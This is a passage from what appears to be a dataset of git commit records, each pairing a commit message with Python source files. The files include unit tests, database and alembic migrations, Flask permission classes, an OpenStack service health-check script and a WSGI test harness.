print "Users<name=%s, fullname=%s, password=%s>" % (row.name, row.fullname, row.password)
if __name__ == '__main__':
parser = OptionParser()
parser.add_option("-c", "--crtdb", dest='cdb', help = "Create database", default=False)
parser.add_option("-i", "--initdb", dest = "idb", help = "Initialize DB: insert test data", default=False)
(options, args) = parser.parse_args()
options.cdb = bool(options.cdb)
options.idb = bool(options.idb)
if options.cdb:
create_db()
if options.idb:
initialize_db()
| Python | 0.000035 | |
712733ead5e36362fe6e2eca1235744c257c7f69 | Create helloWorld.py | helloWorld.py | helloWorld.py | # programe in python
printf("Hello World!")
| Python | 0.999992 | |
bf56a5afed926d7cdd536c1da8ba5b021a09bd95 | Test pipe framework | skan/test/test_pipe.py | skan/test/test_pipe.py | import os
import pytest
import pandas
from skan import pipe
@pytest.fixture
def image_filename():
rundir = os.path.abspath(os.path.dirname(__file__))
datadir = os.path.join(rundir, 'data')
return os.path.join(datadir, 'retic.tif')
def test_pipe(image_filename):
data = pipe.process_images([image_filename], 'fei', 5e-8, 0.1, 0.075,
'Scan/PixelHeight')
assert type(data) == pandas.DataFrame
assert data.shape[0] > 0
| Python | 0 | |
b663bf77fe60a108598db4ae8310e8877d06cddd | Add unit tests for core module | tests/core_test.py | tests/core_test.py | """Test CLI module"""
import os
import sys
import tempfile
import unittest
from mock import mock_open, patch
from context import dfman
from dfman import config, const, core
class TestMainRuntime(unittest.TestCase):
@patch('dfman.core.Config')
@patch.object(dfman.core.MainRuntime, 'set_output_streams')
def test_run_initial_setup(self, _, mock_config):
mc_return = mock_config.return_value
# dry run and verbose are set to false with args
mc_return.getboolean.return_value = False
runtime = dfman.core.MainRuntime(False, False)
runtime.run_initial_setup()
self.assertFalse(runtime.dry_run)
self.assertFalse(runtime.verbose)
# verbose is set to true with config file but not with args
mc_return.getboolean.return_value = True
runtime.run_initial_setup()
self.assertTrue(runtime.verbose)
def test_get_distro(self):
test_os = \
b'''
NAME="Scary Linux"
ID=spooky
PRETTY_NAME="Spooky Scary Linux"
ANSI_COLOR="1;32"
'''
with tempfile.NamedTemporaryFile() as tmp:
tmp.write(test_os)
tmp.seek(0)
runtime = dfman.core.MainRuntime(False, False)
const.SYSTEMD_DISTINFO = tmp.name
self.assertEqual(runtime.get_distro(), 'spooky')
def test_get_overrides(self):
test_config = \
b'''
[Overrides]
file1 = dir1/file1
file2 = dir2/file2
[spooky]
file2 = distoverride/file2
'''
with tempfile.NamedTemporaryFile() as tmp:
tmp.write(test_config)
tmp.seek(0)
config = dfman.Config()
config.cfg_file = tmp.name
config.load_cfg()
runtime = dfman.core.MainRuntime(False, False)
runtime.config = config
runtime.distro = 'spooky'
overrides = runtime.get_overrides()
self.assertEqual(overrides['file1'], 'dir1/file1')
self.assertEqual(overrides['file2'], 'distoverride/file2')
if __name__ == '__main__':
unittest.main()
| Python | 0 | |
be59230531d98dc25f806b2290a51a0f4fde1d3b | Rename model to prevent crash during module upgrade in tests | addons/survey/migrations/8.0.2.0/pre-migration.py | addons/survey/migrations/8.0.2.0/pre-migration.py | # coding: utf-8
from openupgradelib import openupgrade
@openupgrade.migrate()
def migrate(cr, version):
openupgrade.rename_tables(cr, [('survey', 'survey_survey')])
openupgrade.rename_models(cr, [('survey', 'survey.survey')])
| Python | 0 | |
a277a25014c250c04fabb669013305940c867abc | Introduce new variables | openfisca_country_template/variables/stats.py | openfisca_country_template/variables/stats.py | # -*- coding: utf-8 -*-
# This file defines the variables of our legislation.
# A variable is property of a person, or an entity (e.g. a household).
# See http://openfisca.org/doc/variables.html
# Import from openfisca-core the common python objects used to code the legislation in OpenFisca
from openfisca_core.model_api import *
# Import the entities specifically defined for this tax and benefit system
from openfisca_country_template.entities import *
class total_benefits(Variable):
column = FloatCol
entity = Household
definition_period = MONTH
label = "Sum of the benefits perceived by a household"
reference = "https://stats.gov.example/benefits"
def formula(household, period, parameters):
basic_income_i = household.members('basic_income', period) # Calculates the value of basic_income for each member of the household
return (
+ household.sum(basic_income_i) # Sum the household members basic incomes
+ household('housing_allowance', period)
)
class total_taxes(Variable):
column = FloatCol
entity = Household
definition_period = MONTH
label = "Sum of the taxes paid by a household"
reference = "https://stats.gov.example/taxes"
def formula(household, period, parameters):
income_tax_i = household.members('income_tax', period)
social_security_contribution_i = household.members('social_security_contribution', period)
return (
+ household.sum(income_tax_i)
+ household.sum(social_security_contribution_i)
+ household('housing_tax', period.this_year) / 12
)
| Python | 0.000007 | |
4af5ec8c040cc1e1eae6b6208bb7e2cfeac7e146 | Allow custom Permissions to take Requests or Divisions | evesrp/auth/__init__.py | evesrp/auth/__init__.py | import re
from collections import namedtuple
from functools import partial
from flask.ext.login import current_user
from flask.ext.principal import Permission, UserNeed, RoleNeed, identity_loaded
from flask.ext.wtf import Form
from wtforms.fields import SubmitField, HiddenField
from .. import app, db, login_manager, principal
class AuthForm(Form):
submit = SubmitField('Login')
@classmethod
def append_field(cls, name, field):
setattr(cls, name, field)
return cls
class AuthMethod(object):
name = 'Base Authentication'
def form(self):
"""Return an instance of the form to login."""
return AuthForm.append_field('auth_method',
HiddenField(default=self.name))
def login(self, form):
"""Process a validated login form.
You must return a valid response object.
"""
pass
def list_groups(self, user=None):
pass
@classmethod
def register_views(cls, app):
"""Register views (if needed).
This is an optional method to implement.
"""
pass
# Work around some circular imports
from .models import User, Group, Division
@login_manager.user_loader
def login_loader(userid):
"""Pull a user object from the database.
This is used for loading users from existing sessions.
"""
return User.query.get(int(userid))
# This can be confusing, so here goes. Needs really only need to be tuples, of
# some unspecified (but known) length. So, we create named tuples, and then to
# make creating them easier freeze the first argument using partial.
ReimbursementNeed = namedtuple('ReimbursementNeed', ['method', 'division'])
SubmitRequestsNeed = partial(ReimbursementNeed, 'submit')
ReviewRequestsNeed = partial(ReimbursementNeed, 'review')
PayoutRequestsNeed = partial(ReimbursementNeed, 'pay')
# Now, create Permission classes for these kinds of needs.
class SubmitRequestsPermission(Permission):
def __init__(self, div_or_request):
if isinstance(div_or_request, Division):
need = SubmitRequestsNeed(div_or_request.id)
else:
need = SubmitRequestsNeed(div_or_request.division.id)
super(SubmitRequestsPermission, self).__init__(need)
class ReviewRequestsPermission(Permission):
def __init__(self, div_or_request):
if isinstance(div_or_request, Division):
need = ReviewRequestsNeed(div_or_request.id)
else:
need = ReviewRequestsNeed(div_or_request.division.id)
super(ReviewRequestsPermission, self).__init__(need)
class PayoutRequestsPermission(Permission):
def __init__(self, div_or_request):
if isinstance(div_or_request, Division):
need = PayoutRequestsNeed(div_or_request.id)
else:
need = PayoutRequestsNeed(div_or_request.division.id)
super(PayoutRequestsPermission, self).__init__(need)
@identity_loaded.connect_via(app)
def load_user_permissions(sender, identity):
identity.user = current_user
if current_user.is_authenticated():
# Set user role (see and modify their own requests)j
identity.provides.add(UserNeed(current_user.id))
# Set division roles
for role in ('submit', 'review', 'pay'):
for division in current_user.divisions[role]:
identity.provides.add(ReimbursementNeed(role, division.id))
# If they're an admin, set that
if current_user.admin:
identity.provides.add(RoleNeed('admin'))
| import re
from collections import namedtuple
from functools import partial
from flask.ext.login import current_user
from flask.ext.principal import Permission, UserNeed, RoleNeed, identity_loaded
from flask.ext.wtf import Form
from wtforms.fields import SubmitField, HiddenField
from .. import app, db, login_manager, principal
class AuthForm(Form):
submit = SubmitField('Login')
@classmethod
def append_field(cls, name, field):
setattr(cls, name, field)
return cls
class AuthMethod(object):
name = 'Base Authentication'
def form(self):
"""Return an instance of the form to login."""
return AuthForm.append_field('auth_method',
HiddenField(default=self.name))
def login(self, form):
"""Process a validated login form.
You must return a valid response object.
"""
pass
def list_groups(self, user=None):
pass
@classmethod
def register_views(cls, app):
"""Register views (if needed).
This is an optional method to implement.
"""
pass
# Work around some circular imports
from .models import User, Group, Division
@login_manager.user_loader
def login_loader(userid):
"""Pull a user object from the database.
This is used for loading users from existing sessions.
"""
return User.query.get(int(userid))
# This can be confusing, so here goes. Needs really only need to be tuples, of
# some unspecified (but known) length. So, we create named tuples, and then to
# make creating them easier freeze the first argument using partial.
ReimbursementNeed = namedtuple('ReimbursementNeed', ['method', 'division'])
SubmitRequestsNeed = partial(ReimbursementNeed, 'submit')
ReviewRequestsNeed = partial(ReimbursementNeed, 'review')
PayoutRequestsNeed = partial(ReimbursementNeed, 'pay')
# Now, create Permission classes for these kinds of needs.
class SubmitRequestsPermission(Permission):
def __init__(self, division):
need = SubmitRequestsNeed(division.id)
super(SubmitRequestsPermission, self).__init__(need)
class ReviewRequestsPermission(Permission):
def __init__(self, division):
need = ReviewRequestsNeed(division.id)
super(ReviewRequestsPermission, self).__init__(need)
class PayoutRequestsPermission(Permission):
def __init__(self, division):
need = PayoutRequestsNeed(division.id)
super(PayoutRequestsPermission, self).__init__(need)
@identity_loaded.connect_via(app)
def load_user_permissions(sender, identity):
identity.user = current_user
if current_user.is_authenticated():
# Set user role (see and modify their own requests)j
identity.provides.add(UserNeed(current_user.id))
# Set division roles
for role in ('submit', 'review', 'pay'):
for division in current_user.divisions[role]:
identity.provides.add(ReimbursementNeed(role, division.id))
# If they're an admin, set that
if current_user.admin:
identity.provides.add(RoleNeed('admin'))
| Python | 0 |
becba80983c5f0f29f981eadcc79d4f496e1d28b | fix issue #2778 | theme/management/commands/fix_user_quota_model.py | theme/management/commands/fix_user_quota_model.py | from django.contrib.auth.models import User
from django.core.management.base import BaseCommand
from theme.models import UserQuota
class Command(BaseCommand):
help = "This commond can be run to fix the corrupt user data where some users do not " \
"have UserQuota foreign key relation. This management command can be run on a " \
"as-needed basis."
def handle(self, *args, **options):
users = User.objects.filter(is_active=True).filter(is_superuser=False).all()
hs_internal_zone = "hydroshare"
for u in users:
uq = UserQuota.objects.filter(user__username=u.username, zone=hs_internal_zone).first()
if not uq:
# create default UserQuota object for this user
new_uq = UserQuota.objects.create(user=u)
new_uq.save()
| Python | 0 | |
4f1cda8459cb6bca2e317bb582266fb43e78215c | Add test_manager_mixin module. | linguist/tests/test_manager_mixin.py | linguist/tests/test_manager_mixin.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from .base import BaseTestCase
from ..models import Translation
from ..utils.i18n import get_cache_key
class ManagerMixinTest(BaseTestCase):
"""
Tests the Linguist's manager mixin.
"""
def setUp(self):
self.create_registry()
def test_set_instance_cache(self):
from ..mixins import set_instance_cache
translations = [self.translation_en, self.translation_fr]
set_instance_cache(self.instance, translations)
self.assertEqual(
self.instance.cached_translations_count,
Translation.objects.count())
def test_get_translation_lookups(self):
from ..mixins import get_translation_lookups
lookups = get_translation_lookups(self.instance)
self.assertEqual(lookups, {
'identifier': self.instance.identifier,
'object_id': self.instance.pk,
})
lookups = get_translation_lookups(self.instance, fields=['title', 'body'])
self.assertEqual(lookups, {
'identifier': self.instance.identifier,
'object_id': self.instance.pk,
'field_name__in': ['title', 'body'],
})
lookups = get_translation_lookups(self.instance, fields=['title'], languages=['en', 'fr'])
self.assertEqual(lookups, {
'identifier': self.instance.identifier,
'object_id': self.instance.pk,
'field_name__in': ['title'],
'language__in': ['en', 'fr'],
})
| Python | 0 | |
326249502d9884ea5717afff63b8a7caf60f6c2c | check in openstack healthcheck tool | planetstack/tools/openstack-healthcheck.py | planetstack/tools/openstack-healthcheck.py | #! /usr/bin/python
import os
import sys
import subprocess
import time
def get_systemd_status(service):
p=subprocess.Popen(["/bin/systemctl", "is-active", service], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(out, err) = p.communicate()
out = out.strip()
return out
libvirt_enabled = os.system("systemctl -q is-enabled libvirtd.service")==0
nova_compute_enabled = os.system("systemctl -q is-enabled openstack-nova-compute.service")==0
openvswitch_agent_enabled = os.system("systemctl -q is-enabled quantum-openvswitch-agent.service")==0
print "enabled:"
print " libvirtd=", libvirt_enabled
print " openstack-nova-compute=", nova_compute_enabled
print " quantum-openvswitch-agent=", openvswitch_agent_enabled
if (not libvirt_enabled) or (not nova_compute_enabled) or (not openvswitch_agent_enabled):
print "services are not enabled. exiting"
sys.exit(0)
libvirt_status = get_systemd_status("libvirtd.service")
nova_compute_status = get_systemd_status("openstack-nova-compute.service")
openvswitch_agent_status = get_systemd_status("quantum-openvswitch-agent.service")
print "status:"
print " libvirtd=", libvirt_status
print " openstack-nova-compute=", nova_compute_status
print " quantum-openvswitch-agent=", openvswitch_agent_status
if (libvirt_status=="failed") or (nova_compute_status=="failed") or (openvswitch_agent_status=="failed"):
print "services have failed. doing the big restart"
os.system("systemctl stop openstack-nova-compute.service")
os.system("systemctl stop quantum-openvswitch-agent.service")
os.system("systemctl stop libvirtd.service")
time.sleep(5)
os.system("systemctl start libvirtd.service")
time.sleep(5)
os.system("systemctl start quantum-openvswitch-agent.service")
time.sleep(5)
os.system("systemctl start openstack-nova-compute.service")
print "done"
| Python | 0 | |
0e5e3deb8a8250429ee7a1603e017343f6c7e3bb | Create a Testing Suite | tests/run_tests.py | tests/run_tests.py | from unittest import defaultTestLoader, TextTestRunner
import sys
suite = defaultTestLoader.discover(start_dir=".")
result = TextTestRunner(verbosity=2, buffer=True).run(suite)
sys.exit(0 if result.wasSuccessful() else 1)
| Python | 0 | |
ecac8bc83491c9cb2312cf2a1c477c53c4832b4d | Add minimal dead code elimination | pykit/transform/dce.py | pykit/transform/dce.py | # -*- coding: utf-8 -*-
"""
Dead code elimination.
"""
from pykit.analysis import loop_detection
effect_free = set([
'alloca', 'load', 'new_list', 'new_tuple', 'new_dict', 'new_set',
'new_struct', 'new_data', 'new_exc', 'phi', 'exc_setup', 'exc_catch',
'ptrload', 'ptrcast', 'ptr_isnull', 'getfield', 'getindex',
'add', 'sub', 'mul', 'div', 'mod', 'lshift', 'rshift', 'bitand', 'bitor',
'bitxor', 'invert', 'not_', 'uadd', 'usub', 'eq', 'noteq', 'lt', 'lte',
'gt', 'gte', 'is_', 'addressof',
])
def dce(func, env=None):
"""
Eliminate dead code.
TODO: Prune branches, dead loops
"""
for op in func.ops:
if op.opcode in effect_free and len(func.uses[op]) == 0:
op.delete()
run = dce | Python | 0.000589 | |
2fa7855de542bb5ecd303e26d1e9913687478589 | Set up test suite to ensure server admin routes are added. | server/tests/test_admin.py | server/tests/test_admin.py | """General functional tests for the API endpoints."""
from django.test import TestCase, Client
# from django.urls import reverse
from rest_framework import status
from server.models import ApiKey, User
# from api.v2.tests.tools import SalAPITestCase
class AdminTest(TestCase):
"""Test the admin site is configured to have all expected views."""
admin_endpoints = {
'apikey', 'businessunit', 'condition', 'fact', 'historicalfact',
'installedupdate', 'machinedetailplugin', 'machinegroup', 'machine',
'pendingappleupdate', 'pendingupdate', 'pluginscriptrow',
'pluginscriptsubmission', 'plugin', 'report', 'salsetting', 'updatehistoryitem',
'updatehistory', 'userprofile'}
def setUp(self):
self.client = Client()
self.user = User.objects.create(username='test')
def test_no_access(self):
"""Test that unauthenticated requests redirected to login."""
for path in self.admin_endpoints:
response = self.client.get('/admin/server/{}'.format(path))
# Redirect to login page.
self.assertEqual(response.status_code, status.HTTP_301_MOVED_PERMANENTLY)
def test_ro_access(self):
"""Test that ro requests are rejected.
RO users should not have access to the admin site (unless they have
`is_staff = True`.
"""
self.user.user_profile = 'RO'
self.user.save()
self.client.force_login(self.user)
for path in self.admin_endpoints:
url = '/admin/server/{}/'.format(path)
response = self.client.get(url)
msg = 'Failed for path: "{}"'.format(path)
self.assertEqual(response.status_code, status.HTTP_302_FOUND, msg=msg)
self.assertEqual(response.url, '/admin/login/?next=/admin/server/{}/'.format(path),
msg=msg)
def test_ga_access(self):
"""Ensure GA userprofile grants admin page access."""
self.user.user_profile = 'GA'
self.user.save()
self.client.force_login(self.user)
for path in self.admin_endpoints:
url = '/admin/server/{}/'.format(path)
response = self.client.get(url, follow=True)
msg = 'Failed for path: "{}"'.format(path)
self.assertEqual(response.status_code, status.HTTP_200_OK, msg=msg)
| Python | 0 | |
38b12d0581e82ebb0e4fee8500bbd5d83d373afa | Create wikipedia-link-analysis-reducer.py | wikipedia-link-analysis-reducer.py | wikipedia-link-analysis-reducer.py | Python | 0.000008 | ||
a2de972944f1aa990d81ccf9190866b327b552ed | Add xc.py | pymatgen/io/abinit/xc.py | pymatgen/io/abinit/xc.py | # coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
"""
from __future__ import unicode_literals, division, print_function
class XcFunctional(object):
"""
https://wiki.fysik.dtu.dk/gpaw/setups/pawxml.html
The xc_functional element defines the exchange-correlation functional used for
generating the dataset. It has the two attributes type and name.
The type attribute can be LDA, GGA, MGGA or HYB.
The name attribute designates the exchange-correlation functional
and can be specified in the following ways:
[1] Taking the names from the LibXC library. The correlation and exchange names
are stripped from their XC_ part and combined with a + sign. Here is an example for an LDA functional:
<xc_functional type="LDA", name="LDA_X+LDA_C_PW"/>
and this is what PBE will look like:
<xc_functional type="GGA", name="GGA_X_PBE+GGA_C_PBE"/>
[2] Using one of the following pre-defined aliases:
type name LibXC equivalent Reference
LDA PW LDA_X+LDA_C_PW LDA exchange; Perdew, Wang, PRB 45, 13244 (1992)
GGA PW91 GGA_X_PW91+GGA_C_PW91 Perdew et al PRB 46, 6671 (1992)
GGA PBE GGA_X_PBE+GGA_C_PBE Perdew, Burke, Ernzerhof, PRL 77, 3865 (1996)
GGA RPBE GGA_X_RPBE+GGA_C_PBE Hammer, Hansen, Nørskov, PRB 59, 7413 (1999)
GGA revPBE GGA_X_PBE_R+GGA_C_PBE Zhang, Yang, PRL 80, 890 (1998)
GGA PBEsol GGA_X_PBE_SOL+GGA_C_PBE_SOL Perdew et al, PRL 100, 136406 (2008)
GGA AM05 GGA_X_AM05+GGA_C_AM05 Armiento, Mattsson, PRB 72, 085108 (2005)
GGA BLYP GGA_X_B88+GGA_C_LYP Becke, PRA 38, 3098 (1988); Lee, Yang, Parr, PRB 37, 785
For the Abinit conventions see: http://www.abinit.org/doc/helpfiles/for-v7.8/input_variables/varbas.html#ixc
"""
from collections import namedtuple
type_name = namedtuple("type_name", "stype, name")
from pymatgen.io.abinit.libxc import LibxcEnum as xc
aliases = {
(xc.LDA_X, xc.LDA_C_PW): type_name("LDA", "PW"),
(xc.GGA_X_PW91, xc.GGA_C_PW91): type_name("GGA", "PW91"),
(xc.GGA_X_PBE, xc.GGA_C_PBE): type_name("GGA", "PBE"),
(xc.GGA_X_RPBE, xc.GGA_C_PBE): type_name("GGA", "RPBE"),
(xc.GGA_X_PBE_R, xc.GGA_C_PBE): type_name("GGA", "revPBE"),
(xc.GGA_X_PBE_SOL, xc.GGA_C_PBE_SOL): type_name("GGA", "PBEsol"),
(xc.GGA_X_AM05, xc.GGA_C_AM05): type_name("GGA", "AM05"),
(xc.GGA_X_B88, xc.GGA_C_LYP): type_name("GGA", "BLYP"),
}
@classmethod
def from_abinit_ixc(cls, ixc_string):
"""Build XC from the value of the Abinit variable ixc (string)"""
ixc = ixc_string.strip()
if not ixc.startswith("-"):
return cls(**ixc2libxc[ixc])
else:
# libxc notation employed in Abinit: a six-digit number in the form XXXCCC or CCCXXX
first, last = ixc[1:4], ixc[4:]
x, c = LibxcEnum(first), LibxcEnum(last)
if not x.is_xonly: # Swap
x, c = c, x
assert x.is_xonly and c.isconly
return cls(x=x, c=c)
#@classmethod
#def from_type_name(cls, stype, name):
def __init__(self, xc=None, x=None, c=None):
# Consistency check
if xc is None:
if x is not None and c is not None:
raise ValueError("x or c must be specified when xc is None")
else:
if x is not None or c is not None:
raise ValueError("x and c should be None when xc is specified")
self.xc, self.x, self.c = xc, x, c
def __repr__(self):
if self.xc is not None:
return self.xc.name
else:
return "+".join([self.x.name, self.c.name])
__str__ = __repr__
def __hash__(self):
return hash(str(self))
def __eq__(self, other):
return str(self) == str(other)
def __ne__(self, other):
return not self == other
#@property
#def xtype(self):
# """Exchange family"""
#@property
#def xflavor(self):
# """Exchange flavor"""
#@property
#def ctype(self):
# """Correlation family"""
#
#@property
#def cflavor(self):
# """Correlation flavor"""
#@property
#def info(self):
| Python | 0.000002 | |
38f5c8534e3807d0485165017972adf47bd4aa2f | Create utils.py | utilities/utils.py | utilities/utils.py | from zope.interface import implements
from IOperation import IOperation
class Plus(object):
implements(IOperation)
def __call__(self, a, b):
return a + b
class Minus(object):
implements(IOperation)
def __call__(self, a, b):
return a - b
### alternative way to make utility component (using not class-adviser on class level -> using function classImplements)
# from zope.interface import classImplements
# classImplements(Host, IHost)
### also in Python 2.6 and later you can use class decorator @implementer(IFoo)
| Python | 0.000001 | |
7801f5a34fed9c50ebd0d426a69f875026da9602 | Create tutorial2.py | tutorial2.py | tutorial2.py | Python | 0 | ||
0ddac190019753d77b1ed78dcd49ad7370d666df | add some utils | python/irispy/utils.py | python/irispy/utils.py | import numpy as np
import irispy
def lcon_to_vert(A, b):
poly = irispy.Polyhedron(A.shape[1])
poly.setA(A)
poly.setB(b)
V = np.vstack(poly.generatorPoints()).T
def sample_convex_polytope(A, b, nsamples):
poly = irispy.Polyhedron(A.shape[1])
poly.setA(A)
poly.setB(b)
generators = np.vstack(poly.generatorPoints())
lb = np.min(generators, axis=0)
ub = np.max(generators, axis=0)
n = 0
samples = np.zeros((len(lb), nsamples))
while n < nsamples:
z = np.random.uniform(lb, ub)
if np.all(poly.A.dot(z) <= poly.b):
samples[:,n] = z
n += 1
return samples | Python | 0.000001 | |
538cd00a3c0307818cf62c61be3d91007a9b4091 | Add migration for movie.durations_in_s | migrations/versions/349d38252295_.py | migrations/versions/349d38252295_.py | """Add movie.duration_in_s
Revision ID: 349d38252295
Revises: 2b7f5e38dd73
Create Date: 2014-01-09 15:31:24.597000
"""
# revision identifiers, used by Alembic.
revision = '349d38252295'
down_revision = '2b7f5e38dd73'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('movie', sa.Column('duration_in_s', sa.Integer(), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('movie', 'duration_in_s')
### end Alembic commands ###
| Python | 0.000033 | |
98a4029c0e64b82fe4a416030e6338b28e00e999 | test remove_data and pickle, Logit still has fittedvalues | statsmodels/base/tests/test_shrink_pickle.py | statsmodels/base/tests/test_shrink_pickle.py | # -*- coding: utf-8 -*-
"""
Created on Fri Mar 09 16:00:27 2012
Author: Josef Perktold
"""
import pickle
import numpy as np
import statsmodels.api as sm
from numpy.testing import assert_, assert_almost_equal, assert_equal
def check_pickle(obj):
import StringIO
fh = StringIO.StringIO()
pickle.dump(obj, fh)
plen = fh.pos
fh.seek(0,0)
res = pickle.load(fh)
fh.close()
return res, plen
class RemoveDataPickle(object):
def __init__(self):
self.predict_kwds = {}
@classmethod
def setupclass(self):
nobs = 10000
np.random.seed(987689)
x = np.random.randn(nobs, 3)
x = sm.add_constant(x, prepend=True)
self.exog = x
self.xf = 0.25 * np.ones((2,4))
def test_remove_data_pickle(self):
results = self.results
xf = self.xf
pred_kwds = self.predict_kwds
pred1 = results.predict(xf, **pred_kwds)
#create some cached attributes
results.summary()
#check pickle unpickle works on full results
#TODO: drop of load save is tested
res, l = check_pickle(results._results)
#remove data arrays, check predict still works
results.remove_data()
pred2 = results.predict(xf, **pred_kwds)
np.testing.assert_equal(pred2, pred1)
#pickle, unpickle reduced array
res, l = check_pickle(results._results)
#for testing attach res
self.res = res
#Note: 10000 is just a guess for the limit on the length of the pickle
assert_(l < 10000, msg='pickle length not %d < %d' % (l, 10000))
pred3 = results.predict(xf, **pred_kwds)
np.testing.assert_equal(pred3, pred1)
class TestRemoveDataPickleOLS(RemoveDataPickle):
def __init__(self):
super(self.__class__, self).__init__()
#fit for each test, because results will be changed by test
x = self.exog
np.random.seed(987689)
y = x.sum(1) + np.random.randn(x.shape[0])
self.results = sm.OLS(y, self.exog).fit()
class TestRemoveDataPicklePoisson(RemoveDataPickle):
def __init__(self):
super(self.__class__, self).__init__()
#fit for each test, because results will be changed by test
x = self.exog
np.random.seed(987689)
y_count = np.random.poisson(np.exp(x.sum(1)-x.mean()))
model = sm.Poisson(y_count, x)#, exposure=np.ones(nobs), offset=np.zeros(nobs)) #bug with default
#use start_params to converge faster
start_params = np.array([ 0.75334818, 0.99425553, 1.00494724, 1.00247112])
self.results = model.fit(start_params=start_params, method='bfgs')
#TODO: temporary, fixed in master
self.predict_kwds = dict(exposure=1, offset=0)
#TODO: needs to go into pickle save
self.results.mle_settings['callback'] = None
class TestRemoveDataPickleLogit(RemoveDataPickle):
def __init__(self):
super(self.__class__, self).__init__()
#fit for each test, because results will be changed by test
x = self.exog
nobs = x.shape[0]
np.random.seed(987689)
y_bin = (np.random.rand(nobs) < 1./(1+np.exp(x.sum(1)-x.mean()))).astype(int)
model = sm.Logit(y_bin, x)#, exposure=np.ones(nobs), offset=np.zeros(nobs)) #bug with default
#use start_params to converge faster
start_params = np.array([-0.73403806, -1.00901514, -0.97754543, -0.95648212])
self.results = model.fit(start_params=start_params, method='bfgs')
#TODO: needs to go into pickle save
self.results.mle_settings['callback'] = None
if __name__ == '__main__':
for cls in [TestRemoveDataPickleOLS, TestRemoveDataPicklePoisson,
TestRemoveDataPickleLogit]:
cls.setupclass()
tt = cls()
tt.test_remove_data_pickle()
raise
#print results.predict(xf)
print results.model.predict(results.params, xf)
results.summary()
shrinkit = 1
if shrinkit:
results.remove_data()
import pickle
fname = 'try_shrink%d_ols.pickle' % shrinkit
fh = open(fname, 'w')
pickle.dump(results._results, fh) #pickling wrapper doesn't work
fh.close()
fh = open(fname, 'r')
results2 = pickle.load(fh)
fh.close()
print results2.predict(xf)
print results2.model.predict(results.params, xf)
y_count = np.random.poisson(np.exp(x.sum(1)-x.mean()))
model = sm.Poisson(y_count, x)#, exposure=np.ones(nobs), offset=np.zeros(nobs)) #bug with default
results = model.fit(method='bfgs')
results.summary()
print results.model.predict(results.params, xf, exposure=1, offset=0)
if shrinkit:
results.remove_data()
else:
#work around pickling bug
results.mle_settings['callback'] = None
import pickle
fname = 'try_shrink%d_poisson.pickle' % shrinkit
fh = open(fname, 'w')
pickle.dump(results._results, fh) #pickling wrapper doesn't work
fh.close()
fh = open(fname, 'r')
results3 = pickle.load(fh)
fh.close()
print results3.predict(xf, exposure=1, offset=0)
print results3.model.predict(results.params, xf, exposure=1, offset=0)
def check_pickle(obj):
import StringIO
fh = StringIO.StringIO()
pickle.dump(obj, fh)
plen = fh.pos
fh.seek(0,0)
res = pickle.load(fh)
fh.close()
return res, plen
def test_remove_data_pickle(results, xf):
res, l = check_pickle(results)
#Note: 10000 is just a guess for the limit on the length of the pickle
np.testing.assert_(l < 10000, msg='pickle length not %d < %d' % (l, 10000))
pred1 = results.predict(xf, exposure=1, offset=0)
pred2 = res.predict(xf, exposure=1, offset=0)
np.testing.assert_equal(pred2, pred1)
test_remove_data_pickle(results._results, xf)
| Python | 0 | |
25b95c058e7d2aa0eab8d67efd62858435bb4bec | Add the code to fully simulate a WSGI server. | train/wsgi.py | train/wsgi.py | # Copyright 2013 Rackspace
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import os
import pprint
from turnstile import middleware
from train import util
LOG = logging.getLogger(__name__)
class Response(object):
"""
Accumulates a response from an application. The status code will
be in the ``status`` attribute, the headers will be normalized
(upper-case, with dashes converted to underscores) and represented
as a dictionary in the ``headers`` attribute, and the response
body will be stored in the ``body`` attribute.
"""
def __init__(self):
"""
Initialize a ``Response`` object.
"""
self.status = None
self.headers = {}
self.body = ''
def __call__(self, application, environ):
"""
Call the given application with the designated WSGI
environment. Returns the ``Response`` object.
:param application: A WSGI application.
:param environ: The WSGI environment for the request.
"""
# Call the application and consume its response
result = application(environ, self.start_response)
for data in result:
if data:
self.body += data
def start_response(self, status, response_headers, exc_info=None):
"""
The ``start_response`` callable passed as part of the WSGI
specification. No attempt is made to enforce the required
behavior; i.e., this version of ``start_response`` may be
called multiple times without error.
:param status: The status code.
:param response_headers: A list of tuples designating the
response headers and their values.
:param exc_info: Exception information that may be passed by
the application. Ignored.
:returns: Returns the ``write()`` method for compliance with
the WSGI specification.
"""
self.status = status
self.headers.update((k.upper().replace('-', '_'), v)
for k, v in response_headers)
return self.write
def write(self, data):
"""
The ``write`` callable returned by ``start_response()``.
Calling this method is deprecated, but this is supported by
the WSGI specification for backwards compatibility.
:param data: Data to be included in the response body.
"""
self.body += data
class TrainServer(object):
"""
Represents the fake server used to feed requests through the
Turnstile filter. Since the filter expects to be called with
another WSGI callable, this class also implements a fake
application which returns "200 OK" with an "X-Train-Server" header
(value "completed"). The body of the fake response will be the
pretty-printed WSGI environment dictionary.
"""
def __init__(self, filter):
"""
Initialize the ``TrainServer`` object.
:param filter: The Turnstile filter callable.
"""
self.application = filter(self.fake_app)
def __call__(self, environ):
"""
Process a request.
:param environ: The request, represented as a WSGI environment
dictionary. Turnstile will be called to
process the request.
:returns: A ``Response`` instance.
"""
response = Response()
response(self.application, environ)
return response
def fake_app(self, environ, start_response):
"""
Fake WSGI application. Since Turnstile is a filter, it needs
the next application in the pipeline to function properly;
this method acts as that fake application. It returns a "200
OK" response, with the "X-Train-Server" header set to
"completed". The input environment will be pretty-printed and
returned as the body of the response.
:param environ: The request environment.
:param start_response: A callable for starting the response.
:returns: A list of one element: the pretty-printed request
environment.
"""
start_response('200 OK', [('x-train-server', 'completed')])
return [pprint.pformat(environ)]
def start(self, queue):
"""
Read requests from the queue, process them, and log the
results.
:param queue: A queue object, implementing ``get()``.
"""
# Get our PID for logging purposes
pid = os.getpid()
while True:
